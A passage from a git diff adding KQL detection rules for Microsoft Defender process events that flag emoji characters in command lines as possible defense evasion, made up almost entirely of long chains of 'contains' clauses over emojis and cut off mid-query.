ProcessCommandLine contains "🧦" or ProcessCommandLine contains "👗" or ProcessCommandLine contains "👘" or ProcessCommandLine contains "🥻" or ProcessCommandLine contains "🩴" or ProcessCommandLine contains "🩱" or ProcessCommandLine contains "🩲" or ProcessCommandLine contains "🩳" or ProcessCommandLine contains "👙" or ProcessCommandLine contains "👚" or ProcessCommandLine contains "👛" or ProcessCommandLine contains "👜" or ProcessCommandLine contains "👝" or ProcessCommandLine contains "🎒" or ProcessCommandLine contains "👞" or ProcessCommandLine contains "👟" or ProcessCommandLine contains "🥾" or ProcessCommandLine contains "🥿" or ProcessCommandLine contains "👠" or ProcessCommandLine contains "👡" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "👢" or ProcessCommandLine contains "👑" or ProcessCommandLine contains "👒" or ProcessCommandLine contains "🎩" or ProcessCommandLine contains "🎓" or ProcessCommandLine contains "🧢" or ProcessCommandLine contains "⛑" or ProcessCommandLine contains "🪖" or ProcessCommandLine contains "💄" or ProcessCommandLine contains "💍" or ProcessCommandLine contains "💼" or ProcessCommandLine contains "👋🏻" or ProcessCommandLine contains "🤚🏻" or ProcessCommandLine contains "🖐🏻" or ProcessCommandLine contains "✋🏻" or ProcessCommandLine contains "🖖🏻" or ProcessCommandLine contains "👌🏻" or ProcessCommandLine contains "🤌🏻" or ProcessCommandLine contains "🤏🏻" or ProcessCommandLine contains "✌🏻" or ProcessCommandLine contains "🤞🏻" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🤟🏻" or ProcessCommandLine contains "🤘🏻" or ProcessCommandLine contains "🤙🏻" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "👈🏻" or ProcessCommandLine contains "👉🏻" or ProcessCommandLine contains "👆🏻" or ProcessCommandLine contains "🖕🏻" or ProcessCommandLine contains "👇🏻" or ProcessCommandLine contains "☝🏻" or ProcessCommandLine contains "👍🏻" or ProcessCommandLine contains "👎🏻" or ProcessCommandLine contains "✊🏻" or ProcessCommandLine contains "👊🏻" or ProcessCommandLine contains "🤛🏻" or ProcessCommandLine contains "🤜🏻" or ProcessCommandLine contains "👏🏻" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🙌🏻" or ProcessCommandLine contains "👐🏻" or ProcessCommandLine contains "🤲🏻" or ProcessCommandLine contains "🙏🏻" or ProcessCommandLine contains "✍🏻" or ProcessCommandLine contains "💪🏻" or ProcessCommandLine contains "🦵🏻" or ProcessCommandLine contains "🦶🏻" or ProcessCommandLine contains "👂🏻" or ProcessCommandLine contains "🦻🏻" or ProcessCommandLine contains "👃🏻" or ProcessCommandLine contains "👶🏻" or ProcessCommandLine contains "👧🏻" or ProcessCommandLine contains "🧒🏻" or ProcessCommandLine contains "👦🏻" or ProcessCommandLine contains "👩🏻" or ProcessCommandLine contains "🧑🏻" or ProcessCommandLine contains "👨🏻" or ProcessCommandLine contains "👩🏻‍🦱" or ProcessCommandLine contains "🧑🏻‍🦱" or ProcessCommandLine contains "👨🏻‍🦱" or ProcessCommandLine contains "👩🏻‍🦰" or ProcessCommandLine contains "🧑🏻‍🦰" or ProcessCommandLine contains "👨🏻‍🦰" or ProcessCommandLine contains "👱🏻‍♀️" or ProcessCommandLine contains "👱🏻" or ProcessCommandLine contains "👱🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦳" or ProcessCommandLine contains "🧑🏻‍🦳" or ProcessCommandLine contains "👨🏻‍🦳" or ProcessCommandLine contains "👩🏻‍🦲" or ProcessCommandLine contains "🧑🏻‍🦲" or ProcessCommandLine contains "👨🏻‍🦲" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏻" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "👵🏻" or ProcessCommandLine contains "🧓🏻" or ProcessCommandLine contains "👴🏻" or ProcessCommandLine contains "👲🏻" or ProcessCommandLine contains "👳🏻‍♀️" or ProcessCommandLine contains "👳🏻" or ProcessCommandLine contains "👳🏻‍♂️" or ProcessCommandLine contains "🧕🏻" or ProcessCommandLine contains "👮🏻‍♀️" or ProcessCommandLine contains "👮🏻" or ProcessCommandLine contains "👮🏻‍♂️" or ProcessCommandLine contains "👷🏻‍♀️" or ProcessCommandLine contains "👷🏻" or ProcessCommandLine contains "👷🏻‍♂️" or ProcessCommandLine contains "💂🏻‍♀️" or ProcessCommandLine contains "💂🏻" or ProcessCommandLine contains "💂🏻‍♂️" or ProcessCommandLine contains "🕵🏻‍♀️" or ProcessCommandLine contains "🕵🏻" or ProcessCommandLine contains "🕵🏻‍♂️" or ProcessCommandLine contains "👩🏻‍⚕️" or ProcessCommandLine contains "🧑🏻‍⚕️" or ProcessCommandLine contains "👨🏻‍⚕️" or ProcessCommandLine contains "👩🏻‍🌾" or ProcessCommandLine contains "🧑🏻‍🌾" or ProcessCommandLine contains "👨🏻‍🌾" or ProcessCommandLine contains "👩🏻‍🍳" or ProcessCommandLine contains "🧑🏻‍🍳" or ProcessCommandLine contains "👨🏻‍🍳" or ProcessCommandLine contains "👩🏻‍🎓" or ProcessCommandLine contains "🧑🏻‍🎓" or ProcessCommandLine contains "👨🏻‍🎓" or ProcessCommandLine contains "👩🏻‍🎤" or ProcessCommandLine contains "🧑🏻‍🎤" or ProcessCommandLine contains "👨🏻‍🎤" or ProcessCommandLine contains "👩🏻‍🏫" or ProcessCommandLine contains "🧑🏻‍🏫" or ProcessCommandLine contains "👨🏻‍🏫" or ProcessCommandLine contains "👩🏻‍🏭" or ProcessCommandLine contains "🧑🏻‍🏭" or ProcessCommandLine contains "👨🏻‍🏭" or ProcessCommandLine contains "👩🏻‍💻" or ProcessCommandLine contains "🧑🏻‍💻" or ProcessCommandLine contains "👨🏻‍💻" or ProcessCommandLine contains "👩🏻‍💼" or ProcessCommandLine contains "🧑🏻‍💼" or ProcessCommandLine contains "👨🏻‍💼" or ProcessCommandLine contains "👩🏻‍🔧" or ProcessCommandLine contains "🧑🏻‍🔧" or ProcessCommandLine contains "👨🏻‍🔧" or ProcessCommandLine contains "👩🏻‍🔬" or ProcessCommandLine contains "🧑🏻‍🔬" or ProcessCommandLine contains "👨🏻‍🔬" or ProcessCommandLine contains "👩🏻‍🎨" or ProcessCommandLine contains "🧑🏻‍🎨" or ProcessCommandLine contains "👨🏻‍🎨" or ProcessCommandLine contains "👩🏻‍🚒" or ProcessCommandLine contains "🧑🏻‍🚒" or ProcessCommandLine contains "👨🏻‍🚒" or ProcessCommandLine contains "👩🏻‍✈️" or ProcessCommandLine contains "🧑🏻‍✈️" or ProcessCommandLine contains "👨🏻‍✈️" or ProcessCommandLine contains "👩🏻‍🚀" or ProcessCommandLine contains "🧑🏻‍🚀" or ProcessCommandLine contains "👨🏻‍🚀" or ProcessCommandLine contains "👩🏻‍⚖️" or ProcessCommandLine contains "🧑🏻‍⚖️" or ProcessCommandLine contains "👨🏻‍⚖️" or ProcessCommandLine contains "👰🏻‍♀️" or ProcessCommandLine contains "👰🏻" or ProcessCommandLine contains "👰🏻‍♂️" or ProcessCommandLine contains "🤵🏻‍♀️" or ProcessCommandLine contains "🤵🏻" or ProcessCommandLine contains "🤵🏻‍♂️" or ProcessCommandLine contains "👸🏻" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🤴🏻" or ProcessCommandLine contains "🥷🏻" or ProcessCommandLine contains "🦸🏻‍♀️" or ProcessCommandLine contains "🦸🏻" or ProcessCommandLine contains "🦸🏻‍♂️" or ProcessCommandLine contains "🦹🏻‍♀️" or ProcessCommandLine contains "🦹🏻" or ProcessCommandLine contains "🦹🏻‍♂️" or ProcessCommandLine contains "🤶🏻" or ProcessCommandLine contains "🧑🏻‍🎄" or ProcessCommandLine contains "🎅🏻" or ProcessCommandLine contains "🧙🏻‍♀️" or ProcessCommandLine contains "🧙🏻" or ProcessCommandLine contains "🧙🏻‍♂️" or ProcessCommandLine contains "🧝🏻‍♀️" or ProcessCommandLine contains "🧝🏻" or ProcessCommandLine contains "🧝🏻‍♂️" or ProcessCommandLine contains "🧛🏻‍♀️" or ProcessCommandLine contains "🧛🏻" or ProcessCommandLine contains "🧛🏻‍♂️" or ProcessCommandLine contains "🧜🏻‍♀️" or ProcessCommandLine contains "🧜🏻" or ProcessCommandLine contains "🧜🏻‍♂️" or ProcessCommandLine contains "🧚🏻‍♀️" or ProcessCommandLine contains "🧚🏻" or ProcessCommandLine contains "🧚🏻‍♂️" or ProcessCommandLine contains "👼🏻" or ProcessCommandLine contains "🤰🏻" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🤱🏻" or ProcessCommandLine contains "👩🏻‍🍼" or ProcessCommandLine contains "🧑🏻‍🍼" or ProcessCommandLine contains "👨🏻‍🍼" or ProcessCommandLine contains "🙇🏻‍♀️" or ProcessCommandLine contains "🙇🏻" or ProcessCommandLine contains "🙇🏻‍♂️" or ProcessCommandLine contains "💁🏻‍♀️" or ProcessCommandLine contains "💁🏻" or ProcessCommandLine contains "💁🏻‍♂️" or ProcessCommandLine contains "🙅🏻‍♀️" or ProcessCommandLine contains "🙅🏻" or ProcessCommandLine contains "🙅🏻‍♂️" or ProcessCommandLine contains "🙆🏻‍♀️" or ProcessCommandLine contains "🙆🏻" or ProcessCommandLine contains "🙆🏻‍♂️" or ProcessCommandLine contains "🙋🏻‍♀️" or ProcessCommandLine contains "🙋🏻" or ProcessCommandLine contains "🙋🏻‍♂️" or ProcessCommandLine contains "🧏🏻‍♀️" or ProcessCommandLine contains "🧏🏻" or ProcessCommandLine contains "🧏🏻‍♂️" or ProcessCommandLine contains "🤦🏻‍♀️" or ProcessCommandLine contains "🤦🏻" or ProcessCommandLine contains "🤦🏻‍♂️" or ProcessCommandLine contains "🤷🏻‍♀️" or ProcessCommandLine contains "🤷🏻" or ProcessCommandLine contains "🤷🏻‍♂️" or ProcessCommandLine contains "🙎🏻‍♀️" or ProcessCommandLine contains "🙎🏻" or ProcessCommandLine contains "🙎🏻‍♂️" or ProcessCommandLine contains "🙍🏻‍♀️" or ProcessCommandLine contains "🙍🏻" or ProcessCommandLine contains "🙍🏻‍♂️" or ProcessCommandLine contains "💇🏻‍♀️" or ProcessCommandLine contains "💇🏻" or ProcessCommandLine contains "💇🏻‍♂️" or ProcessCommandLine contains "💆🏻‍♀️" or ProcessCommandLine contains "💆🏻" or ProcessCommandLine contains "💆🏻‍♂️" or ProcessCommandLine contains "🧖🏻‍♀️" or ProcessCommandLine contains "🧖🏻" or ProcessCommandLine contains "🧖🏻‍♂️" or ProcessCommandLine contains "💃🏻" or ProcessCommandLine contains "🕺🏻" or ProcessCommandLine contains "🕴🏻" or ProcessCommandLine contains "👩🏻‍🦽" or ProcessCommandLine contains "🧑🏻‍🦽" or ProcessCommandLine contains "👨🏻‍🦽" or ProcessCommandLine contains "👩🏻‍🦼" or ProcessCommandLine contains "🧑🏻‍🦼" or ProcessCommandLine contains "👨🏻‍🦼" or ProcessCommandLine contains "🚶🏻‍♀️" or ProcessCommandLine contains "🚶🏻" or ProcessCommandLine contains "🚶🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦯" or ProcessCommandLine contains "🧑🏻‍🦯" or ProcessCommandLine contains "👨🏻‍🦯" or ProcessCommandLine contains "🧎🏻‍♀️" or ProcessCommandLine contains "🧎🏻" or ProcessCommandLine contains "🧎🏻‍♂️" or ProcessCommandLine contains "🏃🏻‍♀️" or ProcessCommandLine contains "🏃🏻" or ProcessCommandLine contains "🏃🏻‍♂️" or ProcessCommandLine contains "🧍🏻‍♀️" or ProcessCommandLine contains "🧍🏻" or ProcessCommandLine contains "🧍🏻‍♂️" or ProcessCommandLine contains "👭🏻" or ProcessCommandLine contains "🧑🏻‍🤝‍🧑🏻" or ProcessCommandLine contains "👬🏻" or ProcessCommandLine contains "👫🏻" or ProcessCommandLine contains "🧗🏻‍♀️" or ProcessCommandLine contains "🧗🏻" or ProcessCommandLine contains "🧗🏻‍♂️" or ProcessCommandLine contains "🏇🏻" or ProcessCommandLine contains "🏂🏻" or ProcessCommandLine contains "🏌🏻‍♀️" or ProcessCommandLine contains "🏌🏻" or ProcessCommandLine contains "🏌🏻‍♂️" or ProcessCommandLine contains "🏄🏻‍♀️" or ProcessCommandLine contains "🏄🏻" or ProcessCommandLine contains "🏄🏻‍♂️" or ProcessCommandLine contains "🚣🏻‍♀️" or ProcessCommandLine contains "🚣🏻" or ProcessCommandLine contains "🚣🏻‍♂️" or ProcessCommandLine contains "🏊🏻‍♀️" or ProcessCommandLine contains "🏊🏻" or ProcessCommandLine contains "🏊🏻‍♂️" or ProcessCommandLine contains "⛹🏻‍♀️" or ProcessCommandLine contains "⛹🏻" or ProcessCommandLine contains "⛹🏻‍♂️" or ProcessCommandLine contains "🏋🏻‍♀️" or ProcessCommandLine contains "🏋🏻" or ProcessCommandLine contains "🏋🏻‍♂️" or ProcessCommandLine contains "🚴🏻‍♀️" or ProcessCommandLine contains "🚴🏻" or ProcessCommandLine contains "🚴🏻‍♂️" or ProcessCommandLine contains "🚵🏻‍♀️" or ProcessCommandLine contains "🚵🏻" or ProcessCommandLine contains "🚵🏻‍♂️" or ProcessCommandLine contains "🤸🏻‍♀️" or ProcessCommandLine contains "🤸🏻" or ProcessCommandLine contains "🤸🏻‍♂️" or ProcessCommandLine contains "🤽🏻‍♀️" or ProcessCommandLine contains "🤽🏻" or ProcessCommandLine contains "🤽🏻‍♂️" or ProcessCommandLine contains "🤾🏻‍♀️" or ProcessCommandLine contains "🤾🏻" or ProcessCommandLine contains "🤾🏻‍♂️" or ProcessCommandLine contains "🤹🏻‍♀️" or ProcessCommandLine contains "🤹🏻" or ProcessCommandLine contains "🤹🏻‍♂️" or ProcessCommandLine contains "🧘🏻‍♀️" or ProcessCommandLine contains "🧘🏻" or ProcessCommandLine contains "🧘🏻‍♂️" or ProcessCommandLine contains "🛀🏻" or ProcessCommandLine contains "🛌🏻" or ProcessCommandLine contains "👋🏼" or ProcessCommandLine contains "🤚🏼" or ProcessCommandLine contains "🖐🏼" or ProcessCommandLine contains "✋🏼" or ProcessCommandLine contains "🖖🏼" or ProcessCommandLine contains "👌🏼" or ProcessCommandLine contains "🤌🏼" or ProcessCommandLine contains "🤏🏼" or ProcessCommandLine contains "✌🏼" or ProcessCommandLine contains "🤞🏼" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🤟🏼" or ProcessCommandLine contains "🤘🏼" or ProcessCommandLine contains "🤙🏼" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "👈🏼" or ProcessCommandLine contains "👉🏼" or ProcessCommandLine contains "👆🏼" or ProcessCommandLine contains "🖕🏼" or ProcessCommandLine contains "👇🏼" or ProcessCommandLine contains "☝🏼" or ProcessCommandLine contains "👍🏼" or ProcessCommandLine contains "👎🏼" or ProcessCommandLine contains "✊🏼" or ProcessCommandLine contains "👊🏼" or ProcessCommandLine contains "🤛🏼" or ProcessCommandLine contains "🤜🏼" or ProcessCommandLine contains "👏🏼" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🙌🏼" or ProcessCommandLine contains "👐🏼" or ProcessCommandLine contains "🤲🏼" or ProcessCommandLine contains "🙏🏼" or ProcessCommandLine contains "✍🏼" or ProcessCommandLine contains "💪🏼" or ProcessCommandLine contains "🦵🏼" or ProcessCommandLine contains "🦶🏼" or ProcessCommandLine contains "👂🏼" or ProcessCommandLine contains "🦻🏼" or ProcessCommandLine contains "👃🏼" or ProcessCommandLine contains "👶🏼" or ProcessCommandLine contains "👧🏼" or ProcessCommandLine contains "🧒🏼" or ProcessCommandLine contains "👦🏼" or ProcessCommandLine contains "👩🏼" or ProcessCommandLine contains "🧑🏼" or ProcessCommandLine contains "👨🏼" or ProcessCommandLine contains "👩🏼‍🦱" or ProcessCommandLine contains "🧑🏼‍🦱" or ProcessCommandLine contains "👨🏼‍🦱" or ProcessCommandLine contains "👩🏼‍🦰" or ProcessCommandLine contains "🧑🏼‍🦰" or ProcessCommandLine contains "👨🏼‍🦰" or ProcessCommandLine contains "👱🏼‍♀️" or ProcessCommandLine contains "👱🏼" or ProcessCommandLine contains "👱🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦳" or ProcessCommandLine contains "🧑🏼‍🦳" or ProcessCommandLine contains "👨🏼‍🦳" or ProcessCommandLine contains "👩🏼‍🦲" or ProcessCommandLine contains "🧑🏼‍🦲" or ProcessCommandLine contains "👨🏼‍🦲" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏼" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "👵🏼" or ProcessCommandLine contains "🧓🏼" or ProcessCommandLine contains "👴🏼" or ProcessCommandLine contains "👲🏼" or ProcessCommandLine contains "👳🏼‍♀️" or ProcessCommandLine contains "👳🏼" or ProcessCommandLine contains "👳🏼‍♂️" or ProcessCommandLine contains "🧕🏼" or ProcessCommandLine contains "👮🏼‍♀️" or ProcessCommandLine contains "👮🏼" or ProcessCommandLine contains "👮🏼‍♂️" or ProcessCommandLine contains "👷🏼‍♀️" or ProcessCommandLine contains "👷🏼" or ProcessCommandLine contains "👷🏼‍♂️" or ProcessCommandLine contains "💂🏼‍♀️" or ProcessCommandLine contains "💂🏼" or ProcessCommandLine contains "💂🏼‍♂️" or ProcessCommandLine contains "🕵🏼‍♀️" or ProcessCommandLine contains "🕵🏼" or ProcessCommandLine contains "🕵🏼‍♂️" or ProcessCommandLine contains "👩🏼‍⚕️" or ProcessCommandLine contains "🧑🏼‍⚕️" or ProcessCommandLine contains "👨🏼‍⚕️" or ProcessCommandLine contains "👩🏼‍🌾" or ProcessCommandLine contains "🧑🏼‍🌾" or ProcessCommandLine contains "👨🏼‍🌾" or ProcessCommandLine contains "👩🏼‍🍳" or ProcessCommandLine contains "🧑🏼‍🍳" or ProcessCommandLine contains "👨🏼‍🍳" or ProcessCommandLine contains "👩🏼‍🎓" or ProcessCommandLine contains "🧑🏼‍🎓" or ProcessCommandLine contains "👨🏼‍🎓" or ProcessCommandLine contains "👩🏼‍🎤" or ProcessCommandLine contains "🧑🏼‍🎤" or ProcessCommandLine contains "👨🏼‍🎤" or ProcessCommandLine contains "👩🏼‍🏫" or ProcessCommandLine contains "🧑🏼‍🏫" or ProcessCommandLine contains "👨🏼‍🏫" or ProcessCommandLine contains "👩🏼‍🏭" or ProcessCommandLine contains "🧑🏼‍🏭" or ProcessCommandLine contains "👨🏼‍🏭" or ProcessCommandLine contains "👩🏼‍💻" or ProcessCommandLine contains "🧑🏼‍💻" or ProcessCommandLine contains "👨🏼‍💻" or ProcessCommandLine contains "👩🏼‍💼" or ProcessCommandLine contains "🧑🏼‍💼" or ProcessCommandLine contains "👨🏼‍💼" or ProcessCommandLine contains "👩🏼‍🔧" or ProcessCommandLine contains "🧑🏼‍🔧" or ProcessCommandLine contains "👨🏼‍🔧" or ProcessCommandLine contains "👩🏼‍🔬" or ProcessCommandLine contains "🧑🏼‍🔬" or ProcessCommandLine contains "👨🏼‍🔬" or ProcessCommandLine contains "👩🏼‍🎨" or ProcessCommandLine contains "🧑🏼‍🎨" or ProcessCommandLine contains "👨🏼‍🎨" or ProcessCommandLine contains "👩🏼‍🚒" or ProcessCommandLine contains "🧑🏼‍🚒" or ProcessCommandLine contains "👨🏼‍🚒" or ProcessCommandLine contains "👩🏼‍✈️" or ProcessCommandLine contains "🧑🏼‍✈️" or ProcessCommandLine contains "👨🏼‍✈️" or ProcessCommandLine contains "👩🏼‍🚀" or ProcessCommandLine contains "🧑🏼‍🚀" or ProcessCommandLine contains "👨🏼‍🚀" or ProcessCommandLine contains "👩🏼‍⚖️" or ProcessCommandLine contains "🧑🏼‍⚖️" or ProcessCommandLine contains "👨🏼‍⚖️" or ProcessCommandLine contains "👰🏼‍♀️" or ProcessCommandLine contains "👰🏼" or ProcessCommandLine contains "👰🏼‍♂️" or ProcessCommandLine contains "🤵🏼‍♀️" or ProcessCommandLine contains "🤵🏼" or ProcessCommandLine contains "🤵🏼‍♂️" or ProcessCommandLine contains "👸🏼" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🤴🏼" or ProcessCommandLine contains "🥷🏼" or ProcessCommandLine contains "🦸🏼‍♀️" or ProcessCommandLine contains "🦸🏼" or ProcessCommandLine contains "🦸🏼‍♂️" or ProcessCommandLine contains "🦹🏼‍♀️" or ProcessCommandLine contains "🦹🏼" or ProcessCommandLine contains "🦹🏼‍♂️" or ProcessCommandLine contains "🤶🏼" or ProcessCommandLine contains "🧑🏼‍🎄" or ProcessCommandLine contains "🎅🏼" or ProcessCommandLine contains "🧙🏼‍♀️" or ProcessCommandLine contains "🧙🏼" or ProcessCommandLine contains "🧙🏼‍♂️" or ProcessCommandLine contains "🧝🏼‍♀️" or ProcessCommandLine contains "🧝🏼" or ProcessCommandLine contains "🧝🏼‍♂️" or ProcessCommandLine contains "🧛🏼‍♀️" or ProcessCommandLine contains "🧛🏼" or ProcessCommandLine contains "🧛🏼‍♂️" or ProcessCommandLine contains "🧜🏼‍♀️" or ProcessCommandLine contains "🧜🏼" or ProcessCommandLine contains "🧜🏼‍♂️" or ProcessCommandLine contains "🧚🏼‍♀️" or ProcessCommandLine contains "🧚🏼" or ProcessCommandLine contains "🧚🏼‍♂️" or ProcessCommandLine contains "👼🏼" or ProcessCommandLine contains "🤰🏼" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🤱🏼" or ProcessCommandLine contains "👩🏼‍🍼" or ProcessCommandLine contains "🧑🏼‍🍼" or ProcessCommandLine contains "👨🏼‍🍼" or ProcessCommandLine contains "🙇🏼‍♀️" or ProcessCommandLine contains "🙇🏼" or ProcessCommandLine contains "🙇🏼‍♂️" or ProcessCommandLine contains "💁🏼‍♀️" or ProcessCommandLine contains "💁🏼" or ProcessCommandLine contains "💁🏼‍♂️" or ProcessCommandLine contains "🙅🏼‍♀️" or ProcessCommandLine contains "🙅🏼" or ProcessCommandLine contains "🙅🏼‍♂️" or ProcessCommandLine contains "🙆🏼‍♀️" or ProcessCommandLine contains "🙆🏼" or ProcessCommandLine contains "🙆🏼‍♂️" or ProcessCommandLine contains "🙋🏼‍♀️" or ProcessCommandLine contains "🙋🏼" or ProcessCommandLine contains "🙋🏼‍♂️" or ProcessCommandLine contains "🧏🏼‍♀️" or ProcessCommandLine contains "🧏🏼" or ProcessCommandLine contains "🧏🏼‍♂️" or ProcessCommandLine contains "🤦🏼‍♀️" or ProcessCommandLine contains "🤦🏼" or ProcessCommandLine contains "🤦🏼‍♂️" or ProcessCommandLine contains "🤷🏼‍♀️"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
new file mode 100644
index 00000000..3870877d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_defense_evasion_activity_via_emoji_usage_in_commandline_2.kql
@@ -0,0 +1,10 @@
+// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2
+// Author: @Kostastsale, TheDFIRReport
+// Date: 2022-12-05
+// Level: high
+// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "🤷🏼" or ProcessCommandLine contains "🤷🏼‍♂️" or ProcessCommandLine contains "🙎🏼‍♀️" or ProcessCommandLine contains "🙎🏼" or ProcessCommandLine contains "🙎🏼‍♂️" or ProcessCommandLine contains "🙍🏼‍♀️" or ProcessCommandLine contains "🙍🏼" or ProcessCommandLine contains "🙍🏼‍♂️" or ProcessCommandLine contains "💇🏼‍♀️" or ProcessCommandLine contains "💇🏼" or ProcessCommandLine contains "💇🏼‍♂️" or ProcessCommandLine contains "💆🏼‍♀️" or ProcessCommandLine contains "💆🏼" or ProcessCommandLine contains "💆🏼‍♂️" or ProcessCommandLine contains "🧖🏼‍♀️" or ProcessCommandLine contains "🧖🏼" or ProcessCommandLine contains "🧖🏼‍♂️" or ProcessCommandLine contains "💃🏼" or ProcessCommandLine contains "🕺🏼" or ProcessCommandLine contains "🕴🏼" or ProcessCommandLine contains "👩🏼‍🦽" or ProcessCommandLine contains "🧑🏼‍🦽" or ProcessCommandLine contains "👨🏼‍🦽" or ProcessCommandLine contains "👩🏼‍🦼" or ProcessCommandLine contains "🧑🏼‍🦼" or ProcessCommandLine contains "👨🏼‍🦼" or ProcessCommandLine contains "🚶🏼‍♀️" or ProcessCommandLine contains "🚶🏼" or ProcessCommandLine contains "🚶🏼‍♂️" or ProcessCommandLine contains "👩🏼‍🦯" or ProcessCommandLine contains "🧑🏼‍🦯" or ProcessCommandLine contains "👨🏼‍🦯" or ProcessCommandLine contains "🧎🏼‍♀️" or ProcessCommandLine contains "🧎🏼" or ProcessCommandLine contains "🧎🏼‍♂️" or ProcessCommandLine contains "🏃🏼‍♀️" or ProcessCommandLine contains "🏃🏼" or ProcessCommandLine contains "🏃🏼‍♂️" or ProcessCommandLine contains "🧍🏼‍♀️" or ProcessCommandLine contains "🧍🏼" or ProcessCommandLine contains "🧍🏼‍♂️" or ProcessCommandLine contains "👭🏼" or ProcessCommandLine contains "🧑🏼‍🤝‍🧑🏼" or ProcessCommandLine contains "👬🏼" or ProcessCommandLine contains "👫🏼" or ProcessCommandLine contains "🧗🏼‍♀️" or ProcessCommandLine contains "🧗🏼" or ProcessCommandLine contains "🧗🏼‍♂️" or ProcessCommandLine contains "🏇🏼" or ProcessCommandLine contains "🏂🏼" or ProcessCommandLine contains "🏌🏼‍♀️" or ProcessCommandLine contains "🏌🏼" or ProcessCommandLine contains "🏌🏼‍♂️" or ProcessCommandLine contains "🏄🏼‍♀️" or ProcessCommandLine contains "🏄🏼" or ProcessCommandLine contains "🏄🏼‍♂️" or ProcessCommandLine contains "🚣🏼‍♀️" or ProcessCommandLine contains "🚣🏼" or ProcessCommandLine contains "🚣🏼‍♂️" or ProcessCommandLine contains "🏊🏼‍♀️" or ProcessCommandLine contains "🏊🏼" or ProcessCommandLine contains "🏊🏼‍♂️" or ProcessCommandLine contains "⛹🏼‍♀️" or ProcessCommandLine contains "⛹🏼" or ProcessCommandLine contains "⛹🏼‍♂️" or ProcessCommandLine contains "🏋🏼‍♀️" or ProcessCommandLine contains "🏋🏼" or ProcessCommandLine contains "🏋🏼‍♂️" or ProcessCommandLine contains "🚴🏼‍♀️" or ProcessCommandLine contains "🚴🏼" or ProcessCommandLine contains "🚴🏼‍♂️" or ProcessCommandLine contains "🚵🏼‍♀️" or ProcessCommandLine contains "🚵🏼" or ProcessCommandLine contains "🚵🏼‍♂️" or ProcessCommandLine contains "🤸🏼‍♀️" or ProcessCommandLine contains "🤸🏼" or ProcessCommandLine contains "🤸🏼‍♂️" or ProcessCommandLine contains "🤽🏼‍♀️" or ProcessCommandLine contains "🤽🏼" or ProcessCommandLine contains "🤽🏼‍♂️" or ProcessCommandLine contains "🤾🏼‍♀️" or ProcessCommandLine contains "🤾🏼" or ProcessCommandLine contains "🤾🏼‍♂️" or ProcessCommandLine contains "🤹🏼‍♀️" or ProcessCommandLine contains "🤹🏼" or ProcessCommandLine contains "🤹🏼‍♂️" or ProcessCommandLine contains "🧘🏼‍♀️" or ProcessCommandLine contains "🧘🏼" or ProcessCommandLine contains "🧘🏼‍♂️" or ProcessCommandLine contains "🛀🏼" or ProcessCommandLine contains "🛌🏼" or ProcessCommandLine contains "👋🏽" or ProcessCommandLine contains "🤚🏽" or ProcessCommandLine contains "🖐🏽" or ProcessCommandLine contains "✋🏽" or ProcessCommandLine contains "🖖🏽" or ProcessCommandLine contains "👌🏽" or ProcessCommandLine contains "🤌🏽" or ProcessCommandLine contains "🤏🏽" or ProcessCommandLine contains "✌🏽" or ProcessCommandLine contains "🤞🏽" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🤟🏽" or ProcessCommandLine contains "🤘🏽" or ProcessCommandLine contains "🤙🏽" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "👈🏽" or ProcessCommandLine contains "👉🏽" or ProcessCommandLine contains "👆🏽" or ProcessCommandLine contains "🖕🏽" or ProcessCommandLine contains "👇🏽" or ProcessCommandLine contains "☝🏽" or ProcessCommandLine contains "👍🏽" or ProcessCommandLine contains "👎🏽" or ProcessCommandLine contains "✊🏽" or ProcessCommandLine contains "👊🏽" or ProcessCommandLine contains "🤛🏽" or ProcessCommandLine contains "🤜🏽" or ProcessCommandLine contains "👏🏽" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🙌🏽" or ProcessCommandLine contains "👐🏽" or ProcessCommandLine contains "🤲🏽" or ProcessCommandLine contains "🙏🏽" or ProcessCommandLine contains "✍🏽" or ProcessCommandLine contains "💪🏽" or ProcessCommandLine contains "🦵🏽" or ProcessCommandLine contains "🦶🏽" or ProcessCommandLine contains "👂🏽" or ProcessCommandLine contains "🦻🏽" or ProcessCommandLine contains "👃🏽" or ProcessCommandLine contains "👶🏽" or ProcessCommandLine contains "👧🏽" or ProcessCommandLine contains "🧒🏽" or ProcessCommandLine contains 